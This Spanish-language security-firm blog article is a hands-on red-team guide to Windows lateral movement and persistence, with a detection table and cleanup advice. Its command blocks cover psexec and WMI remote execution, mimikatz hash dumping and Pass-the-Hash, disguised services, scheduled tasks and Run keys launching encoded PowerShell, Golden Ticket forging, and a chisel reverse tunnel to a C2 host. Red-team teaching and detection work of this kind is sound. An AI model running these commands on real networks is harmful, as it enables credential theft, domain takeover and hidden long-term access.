
1. Introducción
El Movimiento lateral y persistencia marca la diferencia entre un incidente contenido y una brecha total: es la fase en la que el adversario abandona el punto de entrada, se desplaza por la red con credenciales robadas y se asegura un segundo acceso incluso si lo descubren. En una operación de Red Team, el movimiento lateral y persistencia deciden si el ejercicio se convierte en una demostración real del riesgo o en un simple ejercicio de intrusión. En este artículo recorremos la fase decisiva con un enfoque hands-on: técnicas de movimiento con psexec, WMI y Pass-the-Hash, mecanismos de persistencia que sobreviven reinicios, túneles de pivoting con chisel y SSH, y las medidas de detección y limpieza que cierran el ciclo de una operación profesional.
Muchos equipos concentran todos los recursos en el acceso inicial y olvidan que el movimiento lateral y persistencia determinan el tiempo total dentro de la organización: cuanto más desplazamiento, mayor el daño. Este artículo es la guía práctica de esa fase, desde la perspectiva de un Red Team real.
2. Movimiento lateral y persistencia en el ciclo del Red Team
En el marco de referencia de MITRE ATT&CK, el movimiento lateral (TA0008) y la persistencia (TA0003) son dos tácticas consecutivas que convierten un acceso puntual en dominio de una red. Un Red Team profesional planifica el movimiento lateral y persistencia antes incluso de lanzar la primera campaña de phishing: elige los equipos de salto, los usuarios objetivo y las técnicas de ejecución remota, porque cada decisión influye en la evasión de los controles del Blue Team.
La relación entre ambas técnicas es íntima: el movimiento lateral y persistencia comparten infraestructura de credenciales, archivos y servicios. Una cuenta de dominio robada sirve tanto para saltar de equipo como para crear una tarea programada que garantice el reacceso. Por eso los Red Team hablan de un único playbook de fase media: obtener credenciales, desplazarse, anclar la persistencia y repetir el ciclo hasta el objetivo.
Además, el tiempo cuenta: cada hora adicional de movimiento lateral y persistencia aumenta exponencialmente la probabilidad de detección. Las técnicas se eligen por el ruido que generan, desde el prácticamente invisible WMI hasta el ruidoso PSEXEC.
3. Técnicas de movimiento lateral: psexec, WMI y Pass-the-Hash
3.1. Ejecución remota con psexec en el movimiento lateral y persistencia
La ejecución remota con psexec sigue siendo la técnica más extendida para el movimiento lateral: crea un servicio temporal en el equipo remoto, ejecuta el comando con los privilegios del servicio y borra el rastro. Su contrapartida es que genera numerosos eventos 7045 y 4697 en el equipo destino, algo que un SIEM bien configurado detecta al instante:
# Ejecución remota de un comando en un host del segmento de aplicaciones
psexec.exe \\srv-app-01 -u corp.local\adm.carlos -p 'C0ntra2026!' cmd /c whoami
# Ejecución silenciosa de un binario de nosotros desde un recurso compartido
psexec.exe \\srv-app-01 -u corp.local\adm.carlos -p 'C0ntra2026!' \
-s -d \\dc-01\c$\temp\amsi-check.exe
Fig. 1 – Movimiento lateral con psexec sobre un servidor de aplicaciones del laboratorio.
En la operación real, la cadena de compromiso que montamos sobre srv-app-01 aprovechó que adm.carlos era administrador local de los tres servidores del clúster, un fallo detectado con BloodHound en la fase de enumeración.
3.2. WMI: el movimiento lateral silencioso
Cuando el movimiento lateral y persistencia deben rozar la invisibilidad, WMI (Windows Management Instrumentation) es la opción natural: permite ejecutar procesos remotos sin crear servicios, con muy pocos eventos distintos de los de una administración legítima. La ejecución con Win32_Process es directa desde cualquier distribución de impacket:
# Ejecución remota con WMI desde Linux (impacket)
python3 wmiexec.py corp.local/adm.carlos:'C0ntra2026!'@192.168.1.21 'whoami'
# Ejecución remota con WMI desde PowerShell de Windows
$cred = Get-Credential corp.local\adm.carlos
Invoke-CimMethod -ComputerName srv-app-02 -ClassName Win32_Process \
-MethodName Create -Arguments @{CommandLine='powershell -enc SQBFAFgA'} -Credential $cred
Fig. 2 – Movimiento lateral con WMI sin crear servicios temporales en el host de destino.
La detección de este vector requiere correlación avanzada: eventos 4688 con líneas de comandos sospechosas, conexiones WMI iniciadas desde hosts no administrativos y el evento 4648 con origen inusual. Un SIEM que no registre estos patrones deja la operación invisible ante sus propios ojos.
3.3. Pass-the-Hash: moverse sin contraseñas
La joya del movimiento lateral en entornos Windows sigue siendo Pass-the-Hash: con el hash NTLM robado de una sesión administrativa bastan para desplazarse sin conocer la contraseña en claro. La extracción con mimikatz y la inyección son la combinación clásica que sostenía nuestra cadena de movimiento lateral y persistencia entre hosts:
# Volcado de hashes desde el host comprometido
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Inyección del hash del administrador en una nueva sesión PowerShell
mimikatz.exe "privilege::debug" \
"sekurlsa::pth /user:adm.carlos /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell" "exit"
Fig. 3 – Pass-the-Hash con mimikatz para continuar el movimiento lateral entre segmentos de la red.
Este vector se corta con Credential Guard, administradores locales únicos (LAPS) y restricción de delegaciones; en nuestro laboratorio, sin embargo, el movimiento lateral y persistencia completos se ejecutaron porque ninguna de las tres medidas estaba implantada.
4. Persistencia: asegurar el reacceso tras el movimiento lateral
4.1. Servicios, tareas programadas y registro de Windows
La persistencia convierte el movimiento lateral y persistencia en una posición de permanencia: el operador garantiza que, aunque el punto de entrada original se cierre, tendrá un segundo acceso cuando lo necesite. Los mecanismos más habituales se apoyan en servicios que arrancan con el sistema, tareas programadas con desencadenadores discretos y claves del registro Run:
# Crear un servicio de persistencia con sc (nombre legítimo aparente)
sc.exe \\srv-app-01 create "SrvMonSvc" binPath= "cmd /c powershell -enc SQBFAFgA" start= auto
# Tarea programada que ejecuta el payload cada 4 horas con el usuario de servicio
schtasks /create /tn "CheckForUpdates" /tr "powershell -enc SQBFAFgA" \
/sc hourly /mo 4 /ru svc-monitoring /rp 'MyPass1!'
# Persistencia en el registro para el arranque de sesión
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" \
/v OneDriveSync /t REG_SZ /d "powershell -enc SQBFAFgA" /f
Fig. 4 – Mecanismos de persistencia típicos tras el movimiento lateral: servicio, tarea programada y clave Run.
Los nombres imitan servicios legítimos del sistema, porque en cada incursión real el movimiento lateral y persistencia se diseña para engañar a los operadores de SOC: una tarea llamada CheckForUpdates pasa cualquier triaje inicial.
4.2. Cuentas doradas y persistencia a nivel de dominio
La persistencia definitiva se juega a nivel de dominio. Con el hash de krbtgt, un Golden Ticket otorga acceso total mientras el operador lo necesite, incluso con contraseñas de usuarios rotadas; con una cuenta ad hoc en un grupo privilegiado, el reacceso es inmediato. En el laboratorio, el movimiento lateral y persistencia terminaron con la fabricación de un Golden Ticket válido para todo el dominio:
# DCSync del hash de krbtgt desde el DC
mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" "exit"
# Fabricación del Golden Ticket con validez de 10 años
mimikatz.exe "kerberos::golden /user:adm.fantasma /domain:corp.local \
/sid:S-1-5-21-3823548243-928564172-1051963172 /krbtgt:5e2af9e4... \
/ptt" "exit"
Fig. 5 – Golden Ticket: persistencia total a nivel de dominio tras la fase de movimiento lateral.
5. Pivoting y túneles: extender el movimiento lateral y persistencia
Para alcanzar segmentos aislados, el movimiento lateral y persistencia requieren pivoting: convertir un equipo intermedio en un salto hacia la red administrativa. chisel es la herramienta estándar por su capacidad de tunelizar HTTP sobre conexiones salientes, y OpenSSH el plan B en entornos Linux. En la operación, el host br15 comprometido se convirtió en terminal de bastión y desde ahí saltamos al segmento de administración:
# Servidor de chisel en la máquina del Red Team (escucha en 443)
./chisel server -p 443 --reverse
# Cliente de chisel en la máquina comprometida (conexión saliente)
./chisel client https://redteam.c2.local:443 R:127.0.0.1:1080:socks
# Uso del túnel SOCKS para atacar el segmento de administración
proxychains4 -q ssh operator@dc-01 "whoami"
Fig. 6 – Túnel inverso con chisel para extender el movimiento lateral y persistencia hacia el segmento de administración.
La elección del puerto 443 no es casual: el tráfico sale como HTTPS y burla los filtros de salida de la DMZ.
6. Detección y limpieza: cerrar el ciclo
La madurez defensiva se mide en la capacidad de ver el movimiento lateral y persistencia a tiempo. La tabla siguiente cruza cada técnica con sus señales y controles:
| Técnica | Señal de detección | Control recomendado |
|---|---|---|
| psexec | Eventos 7045 y 4697 de nuevo servicio | Alertar creación de servicios fuera de ventanas de mantenimiento |
| WMI | Eventos 4688 y 4648 desde hosts no administrativos | Correlar fuentes de WMI con whitelist de administradores |
| Pass-the-Hash | 4624 entrantes con hashes idénticos desde varios orígenes | Credential Guard, LAPS y cuentas de administrador local únicas |
| Servicios y tareas | 7045 o TaskScheduler con binarios no firmados | Firmado de código y reglas de AppLocker/WDAC |
| Golden Ticket | 4768/4769 con propiedades anómalas | Rotar krbtgt dos veces y monitorizar eventos críticos |
| Túneles chisel | Conexiones salientes persistentes a dominios desconocidos | Proxy corporativo con inspección TLS y whitelist DNS |
La limpieza es la cara oculta de la operación: desinstalar servicios y tareas, borrar los binarios cargados, eliminar las cuentas creadas y revertir los cambios de registro. Para minimizar el daño residual a la red del cliente, las definiciones de MITRE ATT&CK y las líneas base de seguridad de Microsoft son el marco de referencia para preparar y repasar cada movimiento lateral y persistencia.
7. Conclusión
El movimiento lateral y persistencia son la fase que separa a un Red Team profesional de un simple atacante oportunista: exigen planificación, silencio y un conocimiento profundo de la telemetría del adversario. Hemos recorrido la ejecución con psexec, WMI y Pass-the-Hash, la persistencia mediante servicios, tareas, registro y Golden Ticket, y el pivoting con chisel para alcanzar segmentos aislados.
La lección para la defensa es que el movimiento lateral y persistencia solo se detectan si la telemetría está orientada a ellos: eventos de creación de servicios, conexiones WMI anómalas, hash reutilizados y dominios externos persistentes. Y para el equipo ofensivo, la disciplina de limpieza convierte una intrusión brillante en una operación impecable. Si tu organización quiere medir ese riesgo, la documentación referenciada es el punto de partida de cualquier operación seria.
Artículos relacionados: cómo mantener a salvo la zona de movimiento lateral y persistencia en la exfiltración anónima de una operación Red Team y técnicas de eliminación de huellas que cierran el movimiento lateral y persistencia sin dejar rastro.
¿Necesitas ayuda con Movimiento lateral y persistencia en Red Team?
En Jaymon Security ayudamos a las organizaciones a proteger sus sistemas. Desde auditorías de seguridad hasta implementación de SIEM/SOC, nuestro equipo de expertos diseña soluciones a medida.
Contacta con nosotros para una evaluación gratuita de tu infraestructura.